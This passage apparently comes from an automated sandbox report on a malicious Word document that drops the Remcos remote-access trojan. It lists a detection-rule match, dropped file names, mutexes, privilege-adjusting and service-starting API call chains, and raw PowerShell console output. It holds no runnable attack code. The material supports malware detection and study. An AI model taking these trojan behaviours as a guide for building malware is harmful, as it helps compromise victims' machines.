                  Source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: plug[1].scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: plugman23456.scr.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: znlzneAxBVd.exe.5.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: plug[1].scr.2.dr, SliderControl.csBase64 encoded string: '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'
                  Source: plugman23456.scr.2.dr, SliderControl.csBase64 encoded string: 'iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbWFnZVJlYWR5ccllPAAAB7xJREFUeNqMV1tsFGUUPjM7u223291FoBfagqXbC9q6IGrrpYXEWDBa8ZpoTEx88cUEjA+++FKoaHzQBDQxvniJwapQgyEWhYhYtRCkFNpyK0KrvUNvu+3eL+N3/unszna36p+c/LM7M+c7l++c/4y0c+dO+o8lFxcX3+vxeHbIsvwspDQajVoikYikqqqEpZrNZhX/h7Cu4t5h/P4yGAxex7vxf1O8f/9+ktiAffv2pd3ctWuXvHp1fn0wGHhLUZSGgoJ8xeWqpIKiEnI4HJSVZSFZkimuxikUjtC810vj4yM0cOUyjY2NAj90cmZm5lW73T4E/RkNgfGZDdizp3VlLBZ912QyvVRVWWXeUFNLNXdUEzwkVSXsEYpEwgRvCcaR2azAoCyyWMwkyxJdvTZI58+dpYsX+/2zs7MfzM3NtR44cMCXyQBl6Z8tLS3rOIwI+8a6+npyu90UCoZodtZD8XgMYGYymWTsOYl3VEQhjCj4/X5WS2XrSqiqcj1dvOy2njh+7I3BwcG65ubm548cOTK5FC/FgN27d6+FhydqamrW19U/QGuKCskz56FAIEg5OdmUnZ0ND2UAqkIALQBZTCZ4o2TBkDDdujWNiJipusJFK1askn45cXwrIvFjU1PT9mPHjk2kEEy/aG1tXQVifbdhQ/X65id2UGFBPhRNwWuVnE4t59FohHw+X0IWFvw0P79AXu+82H0+vwirw5EnjBoZGaGVThs99fQztG3bdrfD4Ty4ZcsWZ0YDotHY2xz2++ruB7kkmpmZI7s9T3jOuWeAUCgsDNIkLlKiCxsXCgWFMSyKYhJknZiAw0jR1oebqLGx4UFwpgVGyikG7N27tx55fbmu/n4qXlME8FmA24Q3CwsLIqxaqMkAbDQgnhDmAyJJHo9X8MJud6A6xmjVijza9ujjEtL7Snl5+ZaEAYWFRSbUzDtVVdWK210rQpuXZxP55WuRagGuZgBPBWZecHS06zhI6SPohr48pPMWudavpYcaGnPKysrezMUSBqBs7ka5NdxxZw3YHhZK2HPOp+61pji+RNSE6OBLhRenhcuVf/v9AboPUa6trW2EUfcIA7xe71P5BQWmO1HngUBAkI1ZbwRngFRPk8KRYazUyiDDu6qIApxEKc9SSVEBuVwuM/j2Ih6xIALycxWuCkEw9hxkFECSwE8F1wwweklpoMst5gW/z9G4y72RwIMm/L1SgWUlBUXFIpRspWYICeWZcqwZpS5yQ0tNLBYTYuxwHEHeZNkk9PJzvDOh15SuQ2k78/FQiQLLLHaHUyjQ86l3Nz38xvDyzkrYE92rRF9fIloaowmHtA5qJjv4Z7FYsnCzVIEiKctigaJoorNpYVdTQh6LxQWhGFwH1YnG3ZEB9d1ogLbToo6YaG5rCwv53JBFCqBMPBOL6blMZTaDcSNiIiUNooSxDKoJg8kpRiTToUWAr/m8kGHIYi+yKnhB5XOd88MhNYaduxu/kEyPTjY14bFR0g2QFsms9ZFoVCWbLY/gsq5LQmdU1DCGC5uVW24y5BxunOkJr3WmG8OuiSmDEekp0LqoiqaUS0FVEsc5VpDLMDg/Py/OdX6BAbkfcDVkajCZwDl6LDrjNVGETr7mc0G7L5PVmks+8Aj6mXQzMnJ77SYmGR4qVDUmwPXOZQQ1lpgx3MkIpILr1xq4srjL4nCbwNkwPj4+A3XjMh/BVzBGcdgikWgaeGqXoyXg6aIBy2ngbDh7D9LR+e6zNDAwcAHqhmWMUl+Njo4FB64PoTnYRZkZwY1dTicXG5spCungyZ2fdTjsNH5rhvr6eml0dPQ3qJzkFFxB2H++gBnOmmsFS20iCnpJGjOQrHHZYIi0pCKMqUhyw2rNQe0rdPrU79Tb23sdmCegMsDFqCIfr/X19gUuX71GazAP6OWol5x+nanbLZeOVPJJcMxKw2M36YejHXTp0qV2kL0vMZC0tbUNTE1PfYgBUp32+KiysmKxBNUM/X150SNiNIJ3my0XU1KQDrYdoFNYmJIPwSlPykiGgWEPiNH5y08/kDk7h6qrqxIVkTSCEse0PoymRybZjPg+s54d6Th6hL7v+H5iaGjoI9w4nzYTtre3L8CA57u6Tl9o/+Zr8kdU2rRpo+AEG6Kddklw1q+JZNj1ySkm2J+Tk0XzvhAdPHiIPv/s07lz5869hynrO3gfyTiW88jc2NjYHA6H2qamph54rHmHxJGYw2g+PDws2jIfYhZLshVrZzwlxjGrNYt42jIrMv09epO+bvuCOjo6Jnp6et7H8PMJnvMu+13Aq7Ozc3jz5s1PIiUtN27cePmhhgZr/YMNGKNqRHfkUY0N4ajw5MRgzHAWnqY47+OT09TV9Rv9CMIh5V34MPkY7xxeCp7RAF7d3d1TlZWVr4Oth2DEm6e6uhpdrgqLe9PdVHp7GeXaneTEyC6raFrIeUSVick7MnyZerr/oH7UeV9f35/9/f3tCPm34NF5gIczYSnLjVDgA79wEpNLz5kzZzaWlpa+UF5+8hHM+oX4QsrGKIXyNiXGLEQkOjk5Oc0dDk3mV/SXTvCmF8Bz/zaqSfyJbFw8eHA3A2Hor7/+psHBGwTm8i3+GFwNKVqU2yC5i8wMQBiIv/1GIPz55af/sf4RYACTajXlBRuURAAAAABJRU5ErkJggg=='
                  Source: znlzneAxBVd.exe.5.dr, SliderControl.csBase64 encoded string: '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'
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.SetAccessControl
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, kiGuuLnuA0qaZ9jFQW.csSecurity API names: _0020.AddAccessRule
                  Source: 5.2.plugman23456.scr.38ea170.4.raw.unpack, gVPP59x0g7rK6ZWOvl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.4fa0000.8.raw.unpack, gVPP59x0g7rK6ZWOvl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 5.2.plugman23456.scr.39a4990.7.raw.unpack, gVPP59x0g7rK6ZWOvl.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: bhvEBA7.tmp.21.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.phis.troj.spyw.expl.evad.winDOC@30/27@3/3
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,??3@YAXPAX@Z,21_2_004182CE
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 23_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,23_2_00410DE1
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_00417952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,25_2_00417952
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,??3@YAXPAX@Z,21_2_00418758
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,??3@YAXPAX@Z,Process32NextW,CloseHandle,21_2_00413D4C
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrCode function: 21_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,21_2_0040B58D
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeCode function: 25_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,25_2_0041AA4A
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$fer ZI-0428.docJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exeMutant created: \Sessions\1\BaseNamedObjects\BvhBtyDlVbLnqYhZtgyQy
                  Source: C:\Users\user\AppData\Roaming\plugman23456.scrMutant created: \Sessions\1\BaseNamedObjects\Rmc-BW3KDF
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8258.tmpJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................|+.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................+.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n................................+.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........,.........................s.................... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................L,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................d,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......,.........................s....................$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s....................2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................!-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................G-.........................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................._-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P..............................-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................,.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P............................."-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................<-.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................`-.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................x-.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1..........-.........................s............X....... .......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................+. .~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~......-.........................s............X.......$.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................-.........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................+..........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ . . .m.m.a.n.d.N.o.t.F.o.u.n.d.E.x.c.e.p.t.i.o.n..................s............X.......2.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................S..........................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s....................l.......................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................ .......(.P........................................................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P........................................................s............X...............................Jump to behavior
                  Source: C:\Windows\SysWOW64\schtasks.exeConsole Write: ................@.'...............'.....(.P..............................&......................................................................Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................R.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................*S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................a.g.a.i.n...............................>S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P.............................JS.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ................................A.t. .l.i.n.e.:.1. .c.h.a.r.:.1.........rS.........................s............h....... .......................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............................................
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeConsole Write: ........................................(.P..............................S.........................s............h...............................
